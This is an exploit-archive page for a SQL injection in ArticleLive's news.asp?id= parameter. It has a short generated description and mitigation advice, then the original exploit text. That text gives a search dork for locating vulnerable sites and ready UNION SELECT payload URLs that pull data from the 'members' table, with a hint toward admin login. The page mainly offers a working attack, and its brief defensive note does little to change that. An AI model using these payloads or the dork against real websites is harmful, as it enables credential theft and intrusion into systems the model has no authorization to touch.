SQL Injection in ArticleLive (Interspire Website Publisher)

vendor:

ArticleLive

by:

ra3ch

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: ArticleLive

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: N/A

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

N/A

SQL Injection in ArticleLive (Interspire Website Publisher)

An attacker can exploit a SQL injection vulnerability in ArticleLive (Interspire Website Publisher) by sending a maliciously crafted HTTP request to the vulnerable server. This can allow the attacker to gain access to sensitive information stored in the database, such as user credentials, or even execute arbitrary code on the server.

Mitigation:

Developers should always use parameterized queries, also known as prepared statements, when interacting with the database. This will ensure that user input is treated as a string value instead of part of a query.

Source

Exploit-DB raw data:

*******************************************************************************
# Author   : ra3ch
# Product  : ArticleLive (Interspire Website Publisher)
# Price    : N/A
# Site     : www.dz4all.com/cc
# Dork     : "Website by Spokane Web Communications" 
# Risk     : High 
*
**Vulnerable script: news.asp?id= (SQL-injection)
*
---------------------------------------------------------
*
*
**http://server/[path]/news.asp?id=  [SQL Inject]
*
*
**news.asp?id=34 union select 1,2,3,4,5,6,7,8,9,10,11 from members
*
*
**Exploit: 
*
**http://server/news.asp?id=118%20union%20select%201,2,3,4,5,6,7,8,9,10,11%20from%20members

**Admin Login->
*
*
**http://server/[path]/Use your intelligence
*
*""""""""""""""""""""
** Greetz to :     ALLAH 
**         All Members of  http://www.DZ4All.cOm/Cc
**          And My BrOther AnGeL25dZ & yasMouh & ProToCoL & Mr.Benladen & n2n & .....